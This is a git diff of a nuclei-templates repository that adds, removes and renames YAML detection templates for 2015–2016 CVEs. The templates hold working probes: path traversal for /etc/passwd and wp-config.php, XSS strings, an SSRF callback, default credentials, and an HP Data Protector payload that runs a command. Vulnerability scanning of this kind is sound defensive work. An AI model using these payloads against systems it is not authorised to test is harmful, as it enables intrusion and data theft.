description: Atlassian Confluence before 5.8.17 allows remote authenticated users to read configuration files via the decoratorName parameter to (1) spaces/viewdefaultdecorator.action or (2) admin/viewdefaultdecorator.action. - reference: - - https://jira.atlassian.com/browse/CONFSERVER-39704?src=confmacro - - https://www.exploit-db.com/exploits/39170/ - - http://www.securityfocus.com/archive/1/537232/100/0/threaded - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N - cvss-score: 4.3 - cve-id: CVE-2015-8399 - cwe-id: CWE-200 - metadata: - shodan-query: http.component:"Atlassian Confluence" - tags: cve,cve2015,atlassian,confluence - -requests: - - method: GET - path: - - "{{BaseURL}}/spaces/viewdefaultdecorator.action?decoratorName" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: body - words: - - "confluence-init.properties" - - "View Default Decorator" - condition: and diff --git a/nuclei-templates/CVE-2015/CVE-2015-8813.yaml b/nuclei-templates/CVE-2015/CVE-2015-8813.yaml deleted file mode 100644 index 6b29a0b822..0000000000 --- a/nuclei-templates/CVE-2015/CVE-2015-8813.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: CVE-2015-8813 - -info: - name: Umbraco SSRF Vulnerability in Feedproxy.aspx - author: emadshanab - severity: high - description: A Server Side Request Forgery (SSRF) vulnerability in Umbraco in Feedproxy.aspx allows attackers to send arbitrary HTTP GET requests.Once you change the URL to the http://local/Umbraco/feedproxy.aspx?url=http://127.0.0.1:80/index, you able to access the localhost application of the server - reference: - - https://blog.securelayer7.net/umbraco-the-open-source-asp-net-cms-multiple-vulnerabilities/ - - https://nvd.nist.gov/vuln/detail/CVE-2015-8813 - - https://github.com/umbraco/Umbraco-CMS/commit/924a016ffe7ae7ea6d516c07a7852f0095eddbce - - http://www.openwall.com/lists/oss-security/2016/02/18/8 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N - cvss-score: 8.2 - cve-id: CVE-2015-8813 - cwe-id: CWE-918 - tags: cve,cve2015,ssrf,oast,umbraco - -requests: - - method: GET - path: - - "{{BaseURL}}/Umbraco/feedproxy.aspx?url=http://{{interactsh-url}}" - - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" diff --git a/nuclei-templates/CVE-2015/CVE-2015-9480.yaml b/nuclei-templates/CVE-2015/CVE-2015-9480.yaml new file mode 100644 index 0000000000..b7aa9e0fe9 --- /dev/null +++ b/nuclei-templates/CVE-2015/CVE-2015-9480.yaml @@ -0,0 +1,28 @@ +id: CVE-2015-9480 +info: + name: WordPress Plugin RobotCPA 5 - Directory Traversal + author: daffainfo + severity: high + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9480 + - https://www.exploit-db.com/exploits/37252 + tags: cve,cve2015,wordpress,wp-plugin,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2015-9480 + cwe-id: CWE-22 + description: "The RobotCPA plugin 5 for WordPress has directory traversal via the f.php l parameter." +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + part: body + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2015/cve-2015-0554.yaml b/nuclei-templates/CVE-2015/cve-2015-0554.yaml new file mode 100644 index 0000000000..a879737372 --- /dev/null +++ b/nuclei-templates/CVE-2015/cve-2015-0554.yaml @@ -0,0 +1,30 @@ +id: CVE-2015-0554 + +info: + name: Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure + author: daffainfo + severity: high + description: The ADB (formerly Pirelli Broadband Solutions) P.DGA4001N router with firmware PDG_TEF_SP_4.06L.6 does not properly restrict access to the web interface, which allows remote attackers to obtain sensitive information or cause a denial of service (device restart) as demonstrated by a direct request to (1) wlsecurity.html or (2) resetrouter.html. + reference: + - https://www.exploit-db.com/exploits/35721 + - https://nvd.nist.gov/vuln/detail/CVE-2015-0554 + tags: cve,cve2015,pirelli,router,disclosure + +requests: + - method: GET + path: + - "{{BaseURL}}/wlsecurity.html" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "var wpapskkey" + - "var WscDevPin" + - "var sessionkey" + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2015/cve-2015-1503.yaml b/nuclei-templates/CVE-2015/cve-2015-1503.yaml deleted file mode 100644 index 273a65668b..0000000000 --- a/nuclei-templates/CVE-2015/cve-2015-1503.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2015-1503 -info: - name: IceWarp Mail Server Directory Traversal - author: 0x_Akoko - severity: high - description: IceWarp Mail Server versions prior to 11.1.1 suffer from a directory traversal vulnerability. - reference: - - https://packetstormsecurity.com/files/147505/IceWarp-Mail-Server-Directory-Traversal.html - - http://www.icewarp.com - - https://nvd.nist.gov/vuln/detail/CVE-2015-1503 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2015-1503 - cwe-id: CWE-200 - tags: cve,cve2015,icewarp,lfi,mail - -requests: - - method: GET - path: - - "{{BaseURL}}/webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd" - - "{{BaseURL}}/webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2015/CVE-2015-1880.yaml b/nuclei-templates/CVE-2015/cve-2015-1880.yaml similarity index 100% rename from nuclei-templates/CVE-2015/CVE-2015-1880.yaml rename to nuclei-templates/CVE-2015/cve-2015-1880.yaml diff --git a/nuclei-templates/CVE-2015/cve-2015-2080.yaml b/nuclei-templates/CVE-2015/cve-2015-2080.yaml deleted file mode 100644 index 67ed7522de..0000000000 --- a/nuclei-templates/CVE-2015/cve-2015-2080.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2015-2080 - -info: - name: Eclipse Jetty Remote Leakage - author: pikpikcu - severity: high - reference: - - https://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md - - https://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html - - http://packetstormsecurity.com/files/130567/Jetty-9.2.8-Shared-Buffer-Leakage.html - description: | - The exception handling code in Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header, aka JetLeak - tags: cve,cve2015,jetty - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 - cve-id: CVE-2015-2080 - cwe-id: CWE-200 - -requests: - - method: POST - path: - - "{{BaseURL}}" - headers: - Referer: \x00 - - matchers-condition: and - matchers: - - type: status - status: - - 400 - - type: word - words: - - "Illegal character 0x0 in state" - part: body diff --git a/nuclei-templates/CVE-2015/cve-2015-3224.yaml b/nuclei-templates/CVE-2015/cve-2015-3224.yaml deleted file mode 100644 index df6b263f83..0000000000 --- a/nuclei-templates/CVE-2015/cve-2015-3224.yaml +++ /dev/null @@ -1,57 +0,0 @@ -id: CVE-2015-3224 - -info: - name: Ruby on Rails Web Console - Remote Code Execution - author: pdteam - severity: medium - description: Ruby on Rails Web Console before 2.1.3, as used with Ruby on Rails 3.x and 4.x, does not properly restrict the use of X-Forwarded-For headers in determining a client's IP address, which allows remote attackers to bypass the whitelisted_ips protection mechanism via a crafted request to request.rb. - impact: | - Remote code execution can lead to unauthorized access, data breaches, and complete compromise of the affected system. - remediation: | - Upgrade to a patched version of Ruby on Rails or disable the Web Console feature. - reference: - - https://www.metahackers.pro/rails-web-console-v2-whitelist-bypass-code-exec/ - - https://www.jomar.fr/posts/2022/basic_recon_to_rce_ii/ - - https://hackerone.com/reports/44513 - - https://nvd.nist.gov/vuln/detail/CVE-2015-3224 - - http://lists.fedoraproject.org/pipermail/package-announce/2015-June/160881.html - classification: - cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N - cvss-score: 4.3 - cve-id: CVE-2015-3224 - cwe-id: CWE-284 - epss-score: 0.92904 - epss-percentile: 0.98975 - cpe: cpe:2.3:a:rubyonrails:web_console:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: rubyonrails - product: web_console - tags: cve2015,cve,ruby,hackerone,rce,rails,intrusive,rubyonrails - -http: - - method: GET - path: - - "{{BaseURL}}/{{randstr}}" - - headers: - X-Forwarded-For: ::1 - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "Rails.root:" - - "Action Controller: Exception caught" - condition: and - - - type: word - part: response - words: - - X-Web-Console-Session-Id - - data-remote-path= - - data-session-id= - case-insensitive: true - condition: or -# digest: 4a0a00473045022100c4b2125a78ee523a116fd826ab60375b59dd4e7783faf87bb57fdb018ec7183702203cd169073ca993580b1ad5b798b29f12ea43ea85d77a1f8eb1fce8095e0a0b34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2015/cve-2015-3648.yaml b/nuclei-templates/CVE-2015/cve-2015-3648.yaml new file mode 100644 index 0000000000..9ea683095c --- /dev/null +++ b/nuclei-templates/CVE-2015/cve-2015-3648.yaml @@ -0,0 +1,27 @@ +id: CVE-2015-3648 + +info: + name: ResourceSpace - Local File inclusion + author: pikpikcu + severity: high + description: ResourceSpace is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input. + reference: + - https://vulners.com/cve/CVE-2015-3648/ + - https://www.securityfocus.com/bid/75019 + tags: cve,cve2015,lfi,resourcespace + +requests: + - method: GET + path: + - "{{BaseURL}}/pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2015/cve-2015-4666.yaml b/nuclei-templates/CVE-2015/cve-2015-4666.yaml new file mode 100644 index 0000000000..30e491e3ac --- /dev/null +++ b/nuclei-templates/CVE-2015/cve-2015-4666.yaml @@ -0,0 +1,46 @@ +id: CVE-2015-4666 + +info: + name: Xceedium Xsuite <=2.4.4.5 - Local File Inclusion + author: 0x_Akoko + severity: medium + description: Xceedium Xsuite 2.4.4.5 and earlier is vulnerable to local file inclusion via opm/read_sessionlog.php that allows remote attackers to read arbitrary files in the logFile parameter. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, disclosure of sensitive information, and potential remote code execution. + remediation: | + Upgrade Xceedium Xsuite to a version higher than 2.4.4.5 or apply the necessary patches provided by the vendor. + reference: + - https://www.modzero.com/advisories/MZ-15-02-Xceedium-Xsuite.txt + - http://packetstormsecurity.com/files/132809/Xceedium-Xsuite-Command-Injection-XSS-Traversal-Escalation.html + - https://nvd.nist.gov/vuln/detail/CVE-2015-4666 + - https://support.ca.com/us/product-content/recommended-reading/security-notices/ca20180614-01--security-notice-for-ca-privileged-access-manager.html + - https://www.exploit-db.com/exploits/37708/ + classification: + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 + cve-id: CVE-2015-4666 + cwe-id: CWE-22 + epss-score: 0.02372 + epss-percentile: 0.89592 + cpe: cpe:2.3:a:xceedium:xsuite:2.3.0:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: xceedium + product: xsuite + tags: cve2015,cve,xceedium,xsuite,lfi,packetstorm,xss + +http: + - method: GET + path: + - "{{BaseURL}}/opm/read_sessionlog.php?logFile=....//....//....//....//etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 +# digest: 4b0a004830460221009504e159cca2e8deb672bbe64a5cb5a8e8ff799780737da40e678ffc7d3e8e32022100af48ee950842847322cef0c2137c1dcbeceda0acf700cdde60d7c2e7d1a02175:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2015/cve-2015-5688.yaml b/nuclei-templates/CVE-2015/cve-2015-5688.yaml deleted file mode 100644 index aef5505ea8..0000000000 --- a/nuclei-templates/CVE-2015/cve-2015-5688.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2015-5688 - -info: - name: Geddy before v13.0.8 LFI - author: pikpikcu - severity: high - description: Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the PATH_INFO to the default URI. - reference: - - https://nodesecurity.io/advisories/geddy-directory-traversal - - https://github.com/geddy/geddy/issues/697 - tags: cve,cve2015,geddy,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0" - part: body - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2015/cve-2015-6477.yaml b/nuclei-templates/CVE-2015/cve-2015-6477.yaml deleted file mode 100644 index 22bd0f786b..0000000000 --- a/nuclei-templates/CVE-2015/cve-2015-6477.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2015-6477 - -info: - name: Nordex NC2 'username' Parameter XSS - description: An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. - reference: - - https://seclists.org/fulldisclosure/2015/Dec/117 - - https://ics-cert.us-cert.gov/advisories/ICSA-15-286-01 - - https://nvd.nist.gov/vuln/detail/CVE-2015-6477 - - author: geeknik - severity: medium - tags: cve,cve2015,xss,iot,nordex,nc2 - -requests: - - method: POST - path: - - "{{BaseURL}}/login" - body: 'connection=basic&userName=admin%27%22%29%3B%7D%3C%2Fscript%3E%3Cscript%3Ealert%28%27{{randstr}}%27%29%3C%2Fscript%3E&pw=nordex&language=en' - - matchers-condition: and - matchers: - - type: word - part: header - words: - - "text/html" - - - type: word - part: body - words: - - "" diff --git a/nuclei-templates/CVE-2015/CVE-2015-6544.yaml b/nuclei-templates/CVE-2015/cve-2015-6544.yaml similarity index 100% rename from nuclei-templates/CVE-2015/CVE-2015-6544.yaml rename to nuclei-templates/CVE-2015/cve-2015-6544.yaml diff --git a/nuclei-templates/CVE-2015/CVE-2015-8349.yaml b/nuclei-templates/CVE-2015/cve-2015-8349.yaml similarity index 100% rename from nuclei-templates/CVE-2015/CVE-2015-8349.yaml rename to nuclei-templates/CVE-2015/cve-2015-8349.yaml diff --git a/nuclei-templates/CVE-2015/cve-2015-8399.yaml b/nuclei-templates/CVE-2015/cve-2015-8399.yaml new file mode 100644 index 0000000000..55ff02a7c7 --- /dev/null +++ b/nuclei-templates/CVE-2015/cve-2015-8399.yaml @@ -0,0 +1,30 @@ +id: CVE-2015-8399 +info: + author: princechaddha + name: Atlassian Confluence configuration files read + severity: medium + description: Atlassian Confluence before 5.8.17 allows remote authenticated users to read configuration files via the decoratorName parameter to (1) spaces/viewdefaultdecorator.action or (2) admin/viewdefaultdecorator.action. + reference: https://jira.atlassian.com/browse/CONFSERVER-39704?src=confmacro + tags: cve,cve2015,atlassian,confluence + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.30 + cve-id: CVE-2015-8399 + cwe-id: CWE-200 + +requests: + - method: GET + path: + - "{{BaseURL}}/spaces/viewdefaultdecorator.action?decoratorName" + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "confluence-init.properties" + - "View Default Decorator" + condition: and + part: body diff --git a/nuclei-templates/CVE-2015/cve-2015-8813.yaml b/nuclei-templates/CVE-2015/cve-2015-8813.yaml new file mode 100644 index 0000000000..cfc4cd20e0 --- /dev/null +++ b/nuclei-templates/CVE-2015/cve-2015-8813.yaml @@ -0,0 +1,27 @@ +id: CVE-2015-8813 + +info: + name: Umbraco SSRF Vulnerability in Feedproxy.aspx + author: emadshanab + severity: high + description: A Server Side Request Forgery (SSRF) vulnerability in Umbraco in Feedproxy.aspx allows attackers to send arbitrary HTTP GET requests.Once you change the URL to the http://local/Umbraco/feedproxy.aspx?url=http://127.0.0.1:80/index, you able to access the localhost application of the server + reference: + - https://blog.securelayer7.net/umbraco-the-open-source-asp-net-cms-multiple-vulnerabilities/ + - https://nvd.nist.gov/vuln/detail/CVE-2015-8813 + tags: cve,cve2015,ssrf,oast,umbraco + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N + cvss-score: 8.20 + cve-id: CVE-2015-8813 + cwe-id: CWE-918 + +requests: + - method: GET + path: + - "{{BaseURL}}/Umbraco/feedproxy.aspx?url=http://{{interactsh-url}}" + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" diff --git a/nuclei-templates/CVE-2016/CVE-2016-0957.yaml b/nuclei-templates/CVE-2016/CVE-2016-0957.yaml new file mode 100644 index 0000000000..d2fb10609d --- /dev/null +++ b/nuclei-templates/CVE-2016/CVE-2016-0957.yaml @@ -0,0 +1,34 @@ +id: CVE-2016-0957 + +info: + name: Adobe AEM Console Disclosure + author: geeknik + severity: high + description: Dispatcher before 4.1.5 in Adobe Experience Manager 5.6.1, 6.0.0, and 6.1.0 does not properly implement a URL filter, which allows remote attackers to bypass dispatcher rules via unspecified vectors. + reference: + - https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html + - https://helpx.adobe.com/security/products/experience-manager/apsb16-05.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2016-0957 + tags: cve,cve2016,adobe,aem + +requests: + - method: GET + path: + - "{{BaseURL}}/system/console?.css" + headers: + Authorization: "Basic YWRtaW46YWRtaW4K" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "Adobe" + - "java.lang" + - "(Runtime)" + condition: and diff --git a/nuclei-templates/wordpress/CVE-2016-1000139.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000139.yaml similarity index 99% rename from nuclei-templates/wordpress/CVE-2016-1000139.yaml rename to nuclei-templates/CVE-2016/CVE-2016-1000139.yaml index 3bc2d8a226..b3ff2bbb88 100644 --- a/nuclei-templates/wordpress/CVE-2016-1000139.yaml +++ b/nuclei-templates/CVE-2016/CVE-2016-1000139.yaml @@ -1,4 +1,5 @@ id: CVE-2016-1000139 + info: name: Infusionsoft Gravity Forms Add-on <= 1.5.11 - XSS author: daffainfo @@ -13,10 +14,12 @@ info: cve-id: CVE-2016-1000139 cwe-id: CWE-79 description: "Reflected XSS in wordpress plugin infusionsoft v1.5.11" + requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22" + matchers-condition: and matchers: - type: word @@ -25,10 +28,12 @@ requests: - 'input type="text" name="ContactId"' condition: and part: body + - type: word part: header words: - text/html + - type: status status: - 200 diff --git a/nuclei-templates/CVE-2016/CVE-2016-1000142.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000142.yaml new file mode 100644 index 0000000000..2d1df9a78d --- /dev/null +++ b/nuclei-templates/CVE-2016/CVE-2016-1000142.yaml @@ -0,0 +1,37 @@ +id: CVE-2016-1000142 + +info: + name: MW Font Changer <= 4.2.5 - Unauthenticated Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: The MW Font Changer WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability. + reference: + - https://wpscan.com/vulnerability/4ff5d65a-ba61-439d-ab7f-745a0648fccc + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000142 + tags: cve,cve2016,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000142 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/parsi-font/css.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - '' + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2016/CVE-2016-1000148.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000148.yaml new file mode 100644 index 0000000000..7340d0b0c2 --- /dev/null +++ b/nuclei-templates/CVE-2016/CVE-2016-1000148.yaml @@ -0,0 +1,37 @@ +id: CVE-2016-1000148 + +info: + name: S3 Video Plugin <= 0.983 - Unauthenticated Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: + - https://wpscan.com/vulnerability/ead796ed-202a-451f-b041-d39c9cf1fb54 + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000148 + tags: cve,cve2016,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000148 + cwe-id: CWE-79 + description: "Reflected XSS in wordpress plugin s3-video v0.983" + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/s3-video/views/video-management/preview_video.php?media=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22" + + matchers-condition: and + matchers: + - type: word + words: + - '<"' + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2016/CVE-2016-1000149.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000149.yaml new file mode 100644 index 0000000000..7998ec03d5 --- /dev/null +++ b/nuclei-templates/CVE-2016/CVE-2016-1000149.yaml @@ -0,0 +1,35 @@ +id: CVE-2016-1000149 + +info: + name: Simpel Reserveren 3 <= 3.5.2 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000149 + tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000149 + cwe-id: CWE-79 + description: "Reflected XSS in wordpress plugin simpel-reserveren v3.5.2" + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/simpel-reserveren/edit.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2016/CVE-2016-10924.yaml b/nuclei-templates/CVE-2016/CVE-2016-10924.yaml new file mode 100644 index 0000000000..b351b79efe --- /dev/null +++ b/nuclei-templates/CVE-2016/CVE-2016-10924.yaml @@ -0,0 +1,35 @@ +id: CVE-2016-10924 + +info: + name: Wordpress eBook Download < 1.2 - Directory Traversal + author: idealphase + severity: high + description: The Wordpress eBook Download plugin was affected by a filedownload.php Local File Inclusion security vulnerability. + reference: + - https://wpscan.com/vulnerability/13d5d17a-00a8-441e-bda1-2fd2b4158a6c + - https://www.exploit-db.com/exploits/39575 + - https://nvd.nist.gov/vuln/detail/CVE-2016-10924 + tags: cve,cve2021,wp-plugin,lfi,wordpress,ebook + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2016-10924 + cwe-id: CWE-22 + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "DB_NAME" + - "DB_PASSWORD" + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2016/CVE-2016-10960.yaml b/nuclei-templates/CVE-2016/CVE-2016-10960.yaml new file mode 100644 index 0000000000..2f47dc4085 --- /dev/null +++ b/nuclei-templates/CVE-2016/CVE-2016-10960.yaml @@ -0,0 +1,37 @@ +id: CVE-2016-10960 + +info: + name: WordPress wSecure Lite < 2.4 - Remote Code Execution + author: daffainfo + severity: high + description: WordPress wsecure plugin before 2.4 is susceptible to remote code execution via shell metacharacters in the wsecure-config.php publish parameter. + reference: + - https://www.pluginvulnerabilities.com/2016/07/12/remote-code-execution-rce-vulnerability-in-wsecure-lite/ + - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wsecure-lite-remote-code-execution-2-3/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960 + - https://wordpress.org/plugins/wsecure/#developers + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2016-10960 + cwe-id: CWE-20 + tags: cve,cve2016,wordpress,wp-plugin,rce + +requests: + - method: POST + path: + - "{{BaseURL}}/wp-content/plugins/wsecure/wsecure-config.php" + body: 'wsecure_action=update&publish=";} header("Nuclei: CVE-2016-10960"); class WSecureConfig2 {var $test="' + + matchers-condition: and + matchers: + - type: word + words: + - "Nuclei: CVE-2016-10960" + condition: and + part: header + - type: status + status: + - 200 + +# Enhanced by mp on 2022/04/12 diff --git a/nuclei-templates/CVE-2016/CVE-2016-10973.yaml b/nuclei-templates/CVE-2016/CVE-2016-10973.yaml new file mode 100644 index 0000000000..38766f39fb --- /dev/null +++ b/nuclei-templates/CVE-2016/CVE-2016-10973.yaml @@ -0,0 +1,53 @@ +id: CVE-2016-10973 + +info: + name: Brafton WordPress Plugin < 3.4.8 - Cross-Site Scripting + author: Harsh + severity: medium + description: | + The Brafton plugin before 3.4.8 for WordPress has XSS via the wp-admin/admin.php?page=BraftonArticleLoader tab parameter to BraftonAdminPage.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + Upgrade to the latest version of the Brafton WordPress Plugin (version 3.4.9 or higher) to mitigate this vulnerability. + reference: + - https://wpscan.com/vulnerability/93568433-0b63-4ea7-bbac-4323d3ee0abd + - https://nvd.nist.gov/vuln/detail/CVE-2026-10973 + - https://github.com/ARPSyndicate/cvemon + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2016-10973 + cwe-id: CWE-79 + epss-score: 0.00177 + epss-percentile: 0.54991 + cpe: cpe:2.3:a:brafton:brafton:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 2 + vendor: brafton + product: brafton + framework: wordpress + tags: cve2016,cve,wpscan,wordpress,wp,wp-plugin,xss,brafton,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin.php?page=BraftonArticleLoader&tab=alert%28document.domain%29 HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "tab = alert(document.domain);")' + - 'contains(body_2, "Brafton Article Loader")' + condition: and +# digest: 490a004630440220056398545c7971a832b6a0a6562ed13c279b426e0b8783134e5536c67d1a589d0220409848bc2ce496563f76afcdeb4851709c338b118dba11b50c81cefc0a171f67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2016/CVE-2016-2004.yaml b/nuclei-templates/CVE-2016/CVE-2016-2004.yaml new file mode 100644 index 0000000000..fc2306739b --- /dev/null +++ b/nuclei-templates/CVE-2016/CVE-2016-2004.yaml @@ -0,0 +1,35 @@ +id: CVE-2016-2004 + +info: + name: HP Data Protector - Arbitrary Command Execution + author: pussycat0x + severity: critical + description: HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623. + reference: + - https://www.exploit-db.com/exploits/39858 + - https://nvd.nist.gov/vuln/detail/CVE-2016-2004 + - http://www.kb.cert.org/vuls/id/267328 + - https://www.exploit-db.com/exploits/39858/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2016-2004 + cwe-id: CWE-306 + tags: cve,cve2016,network,iot,hp,rce + +network: + - inputs: + - data: "00000034320001010101010100010001000100010100203238005c7065726c2e65786500202d6573797374656d282777686f616d69272900" # whoami + type: hex + + host: + - "{{Hostname}}" + - "{{Host}}:5555" + + matchers: + - type: word + encoding: hex + words: + - 